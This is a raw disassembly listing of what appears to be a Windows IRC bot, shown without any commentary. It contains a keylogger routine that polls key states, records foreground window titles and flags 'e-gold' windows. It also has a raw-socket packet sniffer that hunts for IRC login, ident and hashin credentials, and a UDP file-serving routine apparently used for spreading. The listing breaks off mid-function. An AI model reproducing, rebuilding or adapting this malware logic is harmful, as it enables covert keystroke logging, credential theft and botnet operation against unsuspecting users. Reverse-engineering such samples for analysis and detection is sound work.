sub_412197 proc near ; CODE XREF: sub_412197:loc_4125F0�p
; DATA XREF: sub_401ACD+20B3�o ...
var_87C = dword ptr -87Ch
var_878 = dword ptr -878h
var_778 = byte ptr -778h
var_578 = byte ptr -578h
var_577 = byte ptr -577h
var_576 = byte ptr -576h
var_575 = byte ptr -575h
var_574 = byte ptr -574h
var_374 = dword ptr -374h
var_370 = byte ptr -370h
var_26C = byte ptr -26Ch
var_168 = dword ptr -168h
var_164 = dword ptr -164h
var_160 = dword ptr -160h
var_15C = byte ptr -15Ch
var_DC = dword ptr -0DCh
var_D8 = dword ptr -0D8h
var_D0 = byte ptr -0D0h
var_CF = byte ptr -0CFh
var_CE = byte ptr -0CEh
var_CD = byte ptr -0CDh
var_50 = byte ptr -50h
var_3C = byte ptr -3Ch
var_38 = dword ptr -38h
var_2C = word ptr -2Ch
var_2A = word ptr -2Ah
var_28 = dword ptr -28h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 87Ch
mov edx, [ebp+arg_0]
push ebx
push esi
push edi
push 1
xor ebx, ebx
pop eax
mov ecx, 0A9h
mov esi, edx
lea edi, [ebp+var_374]
push ebx
push 2
rep movsd
inc [ebp+var_164]
push 2
mov [ebp+var_10], eax
mov [ebp+var_14], eax
mov [ebp+var_8], eax
mov [edx+2A0h], eax
call dword_4CBA54 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_412237
push 190h
call ds:dword_427080 ; Sleep
cmp [ebp+var_D8], ebx
jnz short loc_412217
push ebx
lea eax, [ebp+var_778]
push [ebp+var_DC]
push eax
lea eax, [ebp+var_15C]
push eax
push [ebp+var_374]
call sub_409869
add esp, 14h
loc_412217: ; CODE XREF: sub_412197+5B�j
lea eax, [ebp+var_778]
push eax
call sub_415D38
push [ebp+var_168]
call sub_40B6D6
pop ecx
pop ecx
push ebx
call ds:dword_4270D4 ; ExitThread
loc_412237: ; CODE XREF: sub_412197+48�j
lea eax, [ebp+var_10]
push 4
push eax
mov edi, 0FFFFh
push 4
push edi
push esi
call dword_4CB9B4 ; setsockopt
lea eax, [ebp+var_14]
push 4
push eax
push 0FFFFFFFBh
push edi
push esi
call dword_4CB9B4 ; setsockopt
mov eax, [ebp+var_168]
push 10h
imul eax, 234h
push ebx
mov dword_43E91C[eax], esi
lea eax, [ebp+var_2C]
push eax
call sub_41BF70
add esp, 0Ch
mov [ebp+var_2C], 2
push [ebp+var_160]
call dword_4CB9D4 ; htons
mov [ebp+var_2A], ax
lea eax, [ebp+var_2C]
push 10h
push eax
push esi
mov [ebp+var_28], ebx
call dword_4CBA00 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_4122C1
push 1388h
call ds:dword_427080 ; Sleep
dec [ebp+var_164]
push [ebp+arg_0]
jmp loc_4125F0
; ---------------------------------------------------------------------------
loc_4122C1: ; CODE XREF: sub_412197+10F�j
lea eax, [ebp+var_370]
push offset dword_429068
push eax
call sub_41BEA2
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+var_4], eax
jnz short loc_412327
push 190h
call ds:dword_427080 ; Sleep
push ebx
lea eax, [ebp+var_778]
push [ebp+var_DC]
push eax
lea eax, [ebp+var_15C]
push eax
push [ebp+var_374]
call sub_409869
lea eax, [ebp+var_778]
push eax
call sub_415D38
push [ebp+var_168]
call sub_40B6D6
add esp, 1Ch
push ebx
call ds:dword_4270D4 ; ExitThread
loc_412327: ; CODE XREF: sub_412197+142�j
; sub_412197+413�j
mov edi, [ebp+arg_0]
cmp [edi+2A0h], ebx
jz loc_4125B3
mov edi, 80h
lea eax, [ebp+var_D0]
push edi
push ebx
push eax
mov [ebp+var_1C], 5
mov [ebp+var_18], 1388h
mov [ebp+var_878], esi
mov [ebp+var_87C], 1
call sub_41BF70
add esp, 0Ch
lea eax, [ebp+var_1C]
push eax
push ebx
lea eax, [ebp+var_87C]
push ebx
push eax
push ebx
call dword_4CB9BC ; select
test eax, eax
jle loc_4125A7
mov al, byte_43DB88
mov ecx, edi
mov [ebp+var_578], al
xor eax, eax
lea edi, [ebp+var_577]
mov [ebp+var_C], 10h
rep stosd
stosw
stosb
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_3C]
push eax
push ebx
lea eax, [ebp+var_D0]
push 80h
push eax
push esi
call dword_4CB9AC ; recvfrom
push [ebp+var_38]
mov [ebp+var_8], eax
call dword_4CBA60 ; inet_ntoa
push eax
lea eax, [ebp+var_50]
push eax
call sub_41C266
cmp [ebp+var_D0], bl
pop ecx
pop ecx
jnz loc_412591
cmp [ebp+var_CF], 1
jnz loc_412497
lea eax, [ebp+var_26C]
push eax
call sub_41B9C0
push ebx
push ebx
push [ebp+var_4]
call sub_41DA8B
push [ebp+var_4]
lea eax, [ebp+var_574]
mov [ebp+var_578], bl
mov [ebp+var_577], 3
push 200h
push 1
push eax
mov [ebp+var_576], bl
mov [ebp+var_575], 1
call sub_41BAFA
add esp, 20h
lea ecx, [ebp+var_3C]
mov [ebp+var_8], eax
add eax, 4
push [ebp+var_C]
push ecx
push ebx
push eax
lea eax, [ebp+var_578]
push eax
push esi
call dword_4CBA38 ; sendto
cmp [ebp+var_D8], ebx
jnz short loc_412485
push ebx
lea eax, [ebp+var_778]
push [ebp+var_DC]
push eax
lea eax, [ebp+var_15C]
push eax
push [ebp+var_374]
call sub_409869
add esp, 14h
loc_412485: ; CODE XREF: sub_412197+2C9�j
lea eax, [ebp+var_778]
push eax
call sub_415D38
pop ecx
jmp loc_4125A7
; ---------------------------------------------------------------------------
loc_412497: ; CODE XREF: sub_412197+257�j
cmp [ebp+var_CF], 4
jnz loc_412591
mov cl, [ebp+var_CD]
mov al, [ebp+var_CE]
cmp cl, 0FFh
mov [ebp+var_578], bl
mov [ebp+var_577], 3
jnz short loc_4124D4
inc al
xor cl, cl
mov [ebp+var_576], al
mov [ebp+var_575], bl
jmp short loc_4124E2
; ---------------------------------------------------------------------------
loc_4124D4: ; CODE XREF: sub_412197+329�j
inc cl
mov [ebp+var_576], al
mov [ebp+var_575], cl
loc_4124E2: ; CODE XREF: sub_412197+33B�j
movzx eax, al
movzx ecx, cl
shl eax, 8
add eax, ecx
mov edi, 200h
shl eax, 9
sub eax, edi
push ebx
push eax
push [ebp+var_4]
call sub_41DA8B
push [ebp+var_4]
lea eax, [ebp+var_574]
push edi
push 1
push eax
call sub_41BAFA
add esp, 1Ch
mov edi, eax
lea eax, [ebp+var_3C]
mov [ebp+var_8], edi
push [ebp+var_C]
push eax
lea eax, [edi+4]
push ebx
push eax
lea eax, [ebp+var_578]
push eax
push esi
call dword_4CBA38 ; sendto
cmp edi, ebx
jnz short loc_4125A7
lea eax, [ebp+var_50]
push eax
lea eax, [ebp+var_778]
push offset dword_434798
push eax
call sub_41C266
add esp, 0Ch
cmp [ebp+var_D8], ebx
jnz short loc_41257C
push ebx
lea eax, [ebp+var_778]
push [ebp+var_DC]
push eax
lea eax, [ebp+var_15C]
push eax
push [ebp+var_374]
call sub_409869
add esp, 14h
loc_41257C: ; CODE XREF: sub_412197+3C0�j
lea eax, [ebp+var_778]
push eax
call sub_415D38
inc dword_4CE4DC
pop ecx
jmp short loc_4125A7
; ---------------------------------------------------------------------------
loc_412591: ; CODE XREF: sub_412197+24A�j
; sub_412197+307�j
push [ebp+var_C]
lea eax, [ebp+var_3C]
push eax
push ebx
push 9
push offset dword_435838
push esi
call dword_4CBA38 ; sendto
loc_4125A7: ; CODE XREF: sub_412197+1E9�j
; sub_412197+2FB�j ...
cmp [ebp+var_8], ebx
jg loc_412327
mov edi, [ebp+arg_0]
loc_4125B3: ; CODE XREF: sub_412197+199�j
push esi
call dword_4CBA6C ; closesocket
push [ebp+var_4]
call sub_41BA3B
dec [ebp+var_164]
cmp [edi+2A0h], ebx
pop ecx
jnz short loc_4125E4
push [ebp+var_168]
call sub_40B6D6
pop ecx
push ebx
call ds:dword_4270D4 ; ExitThread
loc_4125E4: ; CODE XREF: sub_412197+438�j
push 3E8h
call ds:dword_427080 ; Sleep
push edi
loc_4125F0: ; CODE XREF: sub_412197+125�j
call sub_412197
pop edi
pop esi
pop ebx
leave
retn 4
sub_412197 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4125FC proc near ; CODE XREF: sub_4126A7+E2�p
; sub_4126A7+1A4�p ...
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_10 = byte ptr 18h
arg_90 = dword ptr 98h
arg_94 = dword ptr 9Ch
push ebp
mov ebp, esp
sub esp, 200h
cmp [ebp+arg_90], 0
jz short loc_41266C
push esi
mov esi, offset aEGold ; "e-gold"
loc_412614: ; CODE XREF: sub_4125FC+6B�j
push esi
push [ebp+arg_4]
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
jz short loc_41265B
push esi
lea eax, [ebp+var_200]
push [ebp+arg_0]
push offset aSS_5 ; "%s (%s)"
push 200h
push eax
call sub_41C360
push 0
lea eax, [ebp+var_200]
push [ebp+arg_94]
push eax
lea eax, [ebp+arg_10]
push eax
push [ebp+arg_8]
call sub_409869
add esp, 28h
loc_41265B: ; CODE XREF: sub_4125FC+25�j
add esi, 80h
cmp esi, offset dword_436448
jb short loc_412614
pop esi
jmp short loc_4126A3
; ---------------------------------------------------------------------------
loc_41266C: ; CODE XREF: sub_4125FC+10�j
push [ebp+arg_0]
lea eax, [ebp+var_200]
push offset aS_8 ; "%s"
push 200h
push eax
call sub_41C360
push 0
lea eax, [ebp+var_200]
push [ebp+arg_94]
push eax
lea eax, [ebp+arg_10]
push eax
push [ebp+arg_8]
call sub_409869
add esp, 24h
loc_4126A3: ; CODE XREF: sub_4125FC+6E�j
xor eax, eax
leave
retn
sub_4125FC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4126A7 proc near ; DATA XREF: sub_401ACD+7374�o
var_920 = dword ptr -920h
var_91C = byte ptr -91Ch
var_520 = byte ptr -520h
var_4E0 = byte ptr -4E0h
var_2E1 = byte ptr -2E1h
var_2E0 = byte ptr -2E0h
var_E0 = byte ptr -0E0h
var_DC = dword ptr -0DCh
var_58 = dword ptr -58h
var_48 = byte ptr -48h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 920h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
and [ebp+var_920], 0
push 26h
and [ebp+arg_0], 0
pop ecx
mov esi, eax
lea edi, [ebp+var_E0]
rep movsd
mov dword ptr [eax+94h], 1
mov ecx, 0FFh
xor eax, eax
lea edi, [ebp+var_91C]
rep stosd
call dword_4CB958 ; GetForegroundWindow
lea ecx, [ebp+var_48]
push 3Ch
push ecx
push eax
mov [ebp+var_8], eax
call dword_4CB970 ; GetWindowTextA
mov ebx, 200h
loc_412702: ; CODE XREF: sub_4126A7+4A0�j
push 8
call ds:dword_427080 ; Sleep
call dword_4CB958 ; GetForegroundWindow
cmp eax, [ebp+var_8]
jz loc_41287A
lea ecx, [ebp+var_48]
push 3Ch
push ecx
push eax
mov [ebp+var_8], eax
call dword_4CB970 ; GetWindowTextA
cmp [ebp+var_58], 0
jz loc_4127FF
lea eax, [ebp+var_2E0]
push eax
call sub_41B9C0
test eax, eax
pop ecx
jbe short loc_4127B8
lea eax, [ebp+var_48]
push eax
call sub_41B9C0
cmp eax, 1
pop ecx
jnb short loc_4127B8
lea eax, [ebp+var_2E0]
push eax
lea eax, [ebp+var_4E0]
push offset a__S_l_ ; ".».%s.«."
push eax
call sub_41C266
sub esp, 8Ch
lea eax, [ebp+var_48]
lea esi, [ebp+var_E0]
push 26h
pop ecx
mov edi, esp
push eax
lea eax, [ebp+var_4E0]
rep movsd
push eax
call sub_4125FC
mov [ebp+arg_0], eax
push ebx
lea eax, [ebp+var_2E0]
push 0
push eax
call sub_41BF70
add esp, 0ACh
lea eax, [ebp+var_4E0]
push ebx
push 0
push eax
call sub_41BF70
add esp, 0Ch
loc_4127B8: ; CODE XREF: sub_4126A7+9B�j
; sub_4126A7+AA�j
lea eax, [ebp+var_2E0]
push eax
call sub_41B9C0
test eax, eax
pop ecx
jbe loc_41287A
lea eax, [ebp+var_48]
push eax
call sub_41B9C0
test eax, eax
pop ecx
jbe loc_41287A
lea eax, [ebp+var_2E0]
push eax
lea eax, [ebp+var_4E0]
push offset a__S_l_ ; ".».%s.«."
push eax
call sub_41C266
sub esp, 8Ch
jmp short loc_412833
; ---------------------------------------------------------------------------
loc_4127FF: ; CODE XREF: sub_4126A7+86�j
lea eax, [ebp+var_48]
push eax
call sub_41B9C0
test eax, eax
pop ecx
jbe loc_412925
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_2E0]
push eax
lea eax, [ebp+var_4E0]
push offset a__S_l_ChangedW ; ".».%s.«. (Changed Windows: %s)"
push eax
call sub_41C266
sub esp, 88h
loc_412833: ; CODE XREF: sub_4126A7+156�j
push 26h
lea eax, [ebp+var_48]
pop ecx
lea esi, [ebp+var_E0]
mov edi, esp
push eax
lea eax, [ebp+var_4E0]
rep movsd
push eax
call sub_4125FC
mov [ebp+arg_0], eax
push ebx
lea eax, [ebp+var_2E0]
push 0
push eax
call sub_41BF70
add esp, 0ACh
lea eax, [ebp+var_4E0]
push ebx
push 0
push eax
call sub_41BF70
add esp, 0Ch
loc_41287A: ; CODE XREF: sub_4126A7+6C�j
; sub_4126A7+120�j ...
cmp [ebp+var_58], 0
jz loc_412925
push 1
call dword_4CB9A0 ; GetAsyncKeyState
cmp ax, 8001h
jnz loc_412925
lea eax, [ebp+var_2E0]
push eax
call sub_41B9C0
test eax, eax
pop ecx
jbe short loc_412925
call dword_4CB958 ; GetForegroundWindow
lea ecx, [ebp+var_520]
push 3Ch
push ecx
push eax
call dword_4CB970 ; GetWindowTextA
lea eax, [ebp+var_2E0]
push eax
lea eax, [ebp+var_4E0]
push offset a__S_l_ ; ".».%s.«."
push eax
call sub_41C266
sub esp, 8Ch
lea eax, [ebp+var_520]
lea esi, [ebp+var_E0]
push 26h
pop ecx
mov edi, esp
push eax
lea eax, [ebp+var_4E0]
rep movsd
push eax
call sub_4125FC
mov [ebp+arg_0], eax
push ebx
lea eax, [ebp+var_2E0]
push 0
push eax
call sub_41BF70
add esp, 0ACh
lea eax, [ebp+var_4E0]
push ebx
push 0
push eax
call sub_41BF70
add esp, 0Ch
loc_412925: ; CODE XREF: sub_4126A7+164�j
; sub_4126A7+1D7�j ...
mov [ebp+var_4], offset dword_43644C
loc_41292C: ; CODE XREF: sub_4126A7+496�j
push 10h
call dword_4CB8A8 ; GetKeyState
movsx esi, ax
mov eax, [ebp+var_4]
mov edi, [eax-4]
push edi
call dword_4CB9A0 ; GetAsyncKeyState
test ah, 80h
jz short loc_4129C4
push 14h
call dword_4CB8A8 ; GetKeyState
test ax, ax
jz short loc_412975
cmp esi, 0FFFFFFFFh
jle short loc_412975
cmp edi, 40h
jle short loc_412975
cmp edi, 5Bh
jge short loc_412975
mov [ebp+edi*4+var_920], 1
jmp loc_412B32
; ---------------------------------------------------------------------------
loc_412975: ; CODE XREF: sub_4126A7+2AD�j
; sub_4126A7+2B2�j ...
push 14h
call dword_4CB8A8 ; GetKeyState
test ax, ax
jz short loc_4129A0
test esi, esi
jge short loc_4129B4
cmp edi, 40h
jle short loc_4129A0
cmp edi, 5Bh
jge short loc_4129A0
mov [ebp+edi*4+var_920], 2
jmp loc_412B32
; ---------------------------------------------------------------------------
loc_4129A0: ; CODE XREF: sub_4126A7+2D9�j
; sub_4126A7+2E2�j ...
test esi, esi
jge short loc_4129B4
mov [ebp+edi*4+var_920], 3
jmp loc_412B32
; ---------------------------------------------------------------------------
loc_4129B4: ; CODE XREF: sub_4126A7+2DD�j
; sub_4126A7+2FB�j
mov [ebp+edi*4+var_920], 4
jmp loc_412B32
; ---------------------------------------------------------------------------
loc_4129C4: ; CODE XREF: sub_4126A7+2A0�j
mov esi, [ebp+edi*4+var_920]
lea eax, [ebp+edi*4+var_920]
test esi, esi
jz loc_412B32
and dword ptr [eax], 0
lea eax, [ebp+var_2E0]
cmp edi, 8
push eax
jnz short loc_4129FC
call sub_41B9C0
and [ebp+eax+var_2E1], 0
pop ecx
jmp loc_412B32
; ---------------------------------------------------------------------------
loc_4129FC: ; CODE XREF: sub_4126A7+340�j
call sub_41B9C0
cmp eax, 1B9h
pop ecx
jbe short loc_412A42
call dword_4CB958 ; GetForegroundWindow
lea ecx, [ebp+var_48]
push 3Ch
push ecx
push eax
call dword_4CB970 ; GetWindowTextA
cmp [ebp+var_58], 0
jz short loc_412A30
lea eax, [ebp+var_2E0]
push eax
push offset a__S_l_BufferFu ; ".».%s.«. (Buffer full)"
jmp short loc_412A85
; ---------------------------------------------------------------------------
loc_412A30: ; CODE XREF: sub_4126A7+379�j
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_2E0]
push eax
push offset a__S_l_Buffer_0 ; ".».%s.«. (Buffer full) (%s)"
jmp short loc_412AA6
; ---------------------------------------------------------------------------
loc_412A42: ; CODE XREF: sub_4126A7+360�j
cmp edi, 0Dh
jnz loc_412B04
lea eax, [ebp+var_2E0]
push eax
call sub_41B9C0
test eax, eax
pop ecx
jz loc_412B32
call dword_4CB958 ; GetForegroundWindow
lea ecx, [ebp+var_48]
push 3Ch
push ecx
push eax
call dword_4CB970 ; GetWindowTextA
cmp [ebp+var_58], 0
jz short loc_412A96
lea eax, [ebp+var_2E0]
push eax
push offset a__S_l_Return ; ".».%s.«. (Return)"
loc_412A85: ; CODE XREF: sub_4126A7+387�j
lea eax, [ebp+var_4E0]
push eax
call sub_41C266
add esp, 0Ch
jmp short loc_412AB5
; ---------------------------------------------------------------------------
loc_412A96: ; CODE XREF: sub_4126A7+3D0�j
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_2E0]
push eax
push offset a__S_l_ReturnS ; ".».%s.«. (Return) (%s)"
loc_412AA6: ; CODE XREF: sub_4126A7+399�j
lea eax, [ebp+var_4E0]
push eax
call sub_41C266
add esp, 10h
loc_412AB5: ; CODE XREF: sub_4126A7+3ED�j
sub esp, 98h
lea eax, [ebp+var_48]
lea esi, [ebp+var_E0]
push 26h
pop ecx
mov edi, esp
push eax
lea eax, [ebp+var_4E0]
rep movsd
push eax
call sub_4125FC
mov [ebp+arg_0], eax
push ebx
lea eax, [ebp+var_2E0]
push 0
push eax
call sub_41BF70
add esp, 0ACh
lea eax, [ebp+var_4E0]
push ebx
push 0
push eax
call sub_41BF70
add esp, 0Ch
jmp short loc_412B32
; ---------------------------------------------------------------------------
loc_412B04: ; CODE XREF: sub_4126A7+39E�j
cmp esi, 1
jz short loc_412B1D
cmp esi, 3
jz short loc_412B1D
cmp esi, 2
jz short loc_412B18
cmp esi, 4
jnz short loc_412B32
loc_412B18: ; CODE XREF: sub_4126A7+46A�j
push [ebp+var_4]
jmp short loc_412B24
; ---------------------------------------------------------------------------
loc_412B1D: ; CODE XREF: sub_4126A7+460�j
; sub_4126A7+465�j
mov eax, [ebp+var_4]
add eax, 7
push eax
loc_412B24: ; CODE XREF: sub_4126A7+474�j
lea eax, [ebp+var_2E0]
push eax
call sub_41C8A0
pop ecx
pop ecx
loc_412B32: ; CODE XREF: sub_4126A7+2C9�j
; sub_4126A7+2F4�j ...
add [ebp+var_4], 14h
cmp [ebp+var_4], offset dword_436B7C
jl loc_41292C
cmp [ebp+arg_0], 0
jz loc_412702
push [ebp+var_DC]
call sub_40B6D6
pop ecx
push 0
call ds:dword_4270D4 ; ExitThread
sub_4126A7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412B61 proc near ; DATA XREF: sub_401ACD+4150�o
var_102B4 = byte ptr -102B4h
var_102AB = byte ptr -102ABh
var_102A8 = dword ptr -102A8h
var_102A0 = dword ptr -102A0h
var_10293 = byte ptr -10293h
var_1028C = byte ptr -1028Ch
var_2B4 = byte ptr -2B4h
var_B4 = dword ptr -0B4h
var_B0 = byte ptr -0B0h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = byte ptr -20h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 102B4h
call sub_41C500
mov edx, [ebp+arg_0]
push esi
push edi
push 1
pop eax
mov esi, edx
push 25h
lea edi, [ebp+var_B4]
pop ecx
mov [ebp+var_8], eax
rep movsd
mov [edx+90h], eax
xor esi, esi
push 10h
lea eax, [ebp+var_1C]
push esi
push eax
call sub_41BF70
add esp, 0Ch
mov [ebp+var_1C], 2
push esi
call dword_4CB9D4 ; htons
push [ebp+var_B4]
mov [ebp+var_1A], ax
call sub_40AA06
pop ecx
push eax
call dword_4CBA14 ; inet_addr
push esi
push 3
push 2
mov [ebp+var_18], eax
call dword_4CBA54 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_4], edi
jnz short loc_412C36
call dword_4CB968 ; WSAGetLastError
push eax
lea eax, [ebp+var_2B4]
push offset dword_43759C
push eax
call sub_41C266
add esp, 0Ch
cmp [ebp+var_28], esi
jnz short loc_412C19
push esi
lea eax, [ebp+var_2B4]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_B0]
push eax
push [ebp+var_B4]
call sub_409869
add esp, 14h
loc_412C19: ; CODE XREF: sub_412B61+96�j
lea eax, [ebp+var_2B4]
push eax
call sub_415D38
push [ebp+var_30]
call sub_40B6D6
pop ecx
pop ecx
push esi
call ds:dword_4270D4 ; ExitThread
loc_412C36: ; CODE XREF: sub_412B61+76�j
mov eax, [ebp+var_30]
push 10h
imul eax, 234h
mov dword_43E91C[eax], edi
lea eax, [ebp+var_1C]
push eax
push edi
call dword_4CBA00 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_412CBB
call dword_4CB968 ; WSAGetLastError
push eax
lea eax, [ebp+var_2B4]
push offset dword_437570
push eax
call sub_41C266
add esp, 0Ch
cmp [ebp+var_28], esi
jnz short loc_412C97
push esi
lea eax, [ebp+var_2B4]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_B0]
push eax
push [ebp+var_B4]
call sub_409869
add esp, 14h
loc_412C97: ; CODE XREF: sub_412B61+114�j
lea eax, [ebp+var_2B4]
push eax
call sub_415D38
pop ecx
push edi
call dword_4CBA6C ; closesocket
push [ebp+var_30]
call sub_40B6D6
pop ecx
push esi
call ds:dword_4270D4 ; ExitThread
loc_412CBB: ; CODE XREF: sub_412B61+F4�j
push esi
lea eax, [ebp+var_20]
push esi
push eax
push esi
push esi
lea eax, [ebp+var_8]
push 4
push eax
push 98000001h
push edi
call dword_4CB980 ; WSAIoctl
cmp eax, 0FFFFFFFFh
jnz short loc_412D3E
call dword_4CB968 ; WSAGetLastError
push eax
lea eax, [ebp+var_2B4]
push offset dword_437540
push eax
call sub_41C266
add esp, 0Ch
cmp [ebp+var_28], esi
jnz short loc_412D1A
push esi
lea eax, [ebp+var_2B4]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_B0]
push eax
push [ebp+var_B4]
call sub_409869
add esp, 14h
loc_412D1A: ; CODE XREF: sub_412B61+197�j
lea eax, [ebp+var_2B4]
push eax
call sub_415D38
pop ecx
push edi
call dword_4CBA6C ; closesocket
push [ebp+var_30]
call sub_40B6D6
pop ecx
push esi
call ds:dword_4270D4 ; ExitThread
loc_412D3E: ; CODE XREF: sub_412B61+177�j
push ebx
mov ebx, offset a_login ; ":.login"
loc_412D44: ; CODE XREF: sub_412B61+21B�j
; sub_412B61+22D�j ...
mov edi, 0FFFFh
lea eax, [ebp+var_102B4]
push edi
push esi
push eax
call sub_41BF70
add esp, 0Ch
lea eax, [ebp+var_102B4]
push esi
push edi
push eax
push [ebp+var_4]
call dword_4CB9EC ; recv
cmp eax, 0FFFFFFFFh
jz loc_412E71
cmp [ebp+var_102AB], 6
jnz short loc_412D44
mov eax, [ebp+var_102A8]
cmp [ebp+var_10293], 18h
mov [ebp+var_C], eax
jnz short loc_412D44
lea eax, [ebp+var_1028C]
push offset aPsniff_0 ; "[PSNIFF]"
push eax
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
jnz short loc_412D44
lea eax, [ebp+var_1028C]
push offset dword_437524
push eax
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
jnz short loc_412D44
mov eax, ebx
xor edi, edi
test eax, eax
jz loc_412D44
mov [ebp+arg_0], ebx
loc_412DCD: ; CODE XREF: sub_412B61+287�j
push eax
lea eax, [ebp+var_1028C]
push eax
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
jnz short loc_412DEF
inc edi
add [ebp+arg_0], 18h
mov eax, [ebp+arg_0]
jnz short loc_412DCD
jmp loc_412D44
; ---------------------------------------------------------------------------
loc_412DEF: ; CODE XREF: sub_412B61+27D�j
lea eax, [ebp+var_1028C]
push eax
push [ebp+var_102A0]
call dword_4CB904 ; htons
movzx eax, ax
push eax
push [ebp+var_C]
call dword_4CBA60 ; inet_ntoa
push eax
lea eax, [edi+edi*2]
mov eax, dword_436C6C[eax*8]
push off_436C48[eax*4]
lea eax, [ebp+var_2B4]
push offset dword_4374F0
push 200h
push eax
call sub_41C360
add esp, 1Ch
cmp [ebp+var_28], esi
jnz short loc_412E5F
push esi
lea eax, [ebp+var_2B4]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_B0]
push eax
push [ebp+var_B4]
call sub_409869
add esp, 14h
loc_412E5F: ; CODE XREF: sub_412B61+2DC�j
lea eax, [ebp+var_2B4]
push eax
call sub_415D38
pop ecx
jmp loc_412D44
; ---------------------------------------------------------------------------
loc_412E71: ; CODE XREF: sub_412B61+20E�j
call dword_4CB968 ; WSAGetLastError
push eax
push offset dword_4374C4
lea eax, [ebp+var_2B4]
push 200h
push eax
call sub_41C360
add esp, 10h
cmp [ebp+var_28], esi
pop ebx
jnz short loc_412EB7
push esi
lea eax, [ebp+var_2B4]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_B0]
push eax
push [ebp+var_B4]
call sub_409869
add esp, 14h
loc_412EB7: ; CODE XREF: sub_412B61+334�j
lea eax, [ebp+var_2B4]
push eax
call sub_415D38
pop ecx
push [ebp+var_4]
call dword_4CBA6C ; closesocket
push [ebp+var_30]
call sub_40B6D6
pop ecx
push esi
call ds:dword_4270D4 ; ExitThread
sub_412B61 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_412EDD proc near ; CODE XREF: sub_4131EC+213�p
; sub_4131EC+239�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_4CE734, eax
mov eax, offset dword_4CE734
retn
sub_412EDD endp
; =============== S U B R O U T I N E =======================================
sub_412EEC proc near ; CODE XREF: sub_4131EC+2BF�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push offset aBotSniff ; "Bot sniff"
push esi
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
jz short loc_412F06
loc_412F02: ; CODE XREF: sub_412EEC+29�j
; sub_412EEC+3A�j ...
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_412F06: ; CODE XREF: sub_412EEC+14�j
push offset aFaak ; "#FAAK#"
push esi
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
jnz short loc_412F02
push offset aPsniff_1 ; "[PSNIFF]:"
push esi
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
jnz short loc_412F02
push offset aPsniff_2 ; "PSNIFF//"
push esi
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
jnz short loc_412F02
push offset aJoin_0 ; "JOIN #"
push esi
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
jz short loc_412F4E
loc_412F4A: ; CODE XREF: sub_412EEC+71�j
; sub_412EEC+82�j ...
mov al, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_412F4E: ; CODE XREF: sub_412EEC+5C�j
; DATA XREF: .data:off_43ACE0�o
push offset a302 ; "302 "
push esi
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
jnz short loc_412F4A
push offset a366 ; "366 "
push esi
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
jnz short loc_412F4A
push offset a_login_0 ; ":.login"
push esi
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
jnz short loc_412F4A
push offset aLogin ; ":!login"
push esi
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
jnz short loc_412F4A
push offset aLogin_0 ; ":!Login"
push esi
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
jnz short loc_412F4A
push offset a_login_1 ; ":.Login"
push esi
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
jnz short loc_412F4A
push offset a_ident ; ":.ident"
push esi
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
jnz short loc_412F4A
push offset aIdent_0 ; ":!ident"
push esi
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
jnz loc_412F4A
push offset a_hashin ; ":.hashin"
push esi
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
jnz loc_412F4A
push offset aHashin ; ":!hashin"
push esi
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
pop esi
setnz al
retn
sub_412EEC endp
; =============== S U B R O U T I N E =======================================
sub_413003 proc near ; CODE XREF: sub_4131EC+2F8�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push offset aIrcSniff ; "IRC sniff"
push esi
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
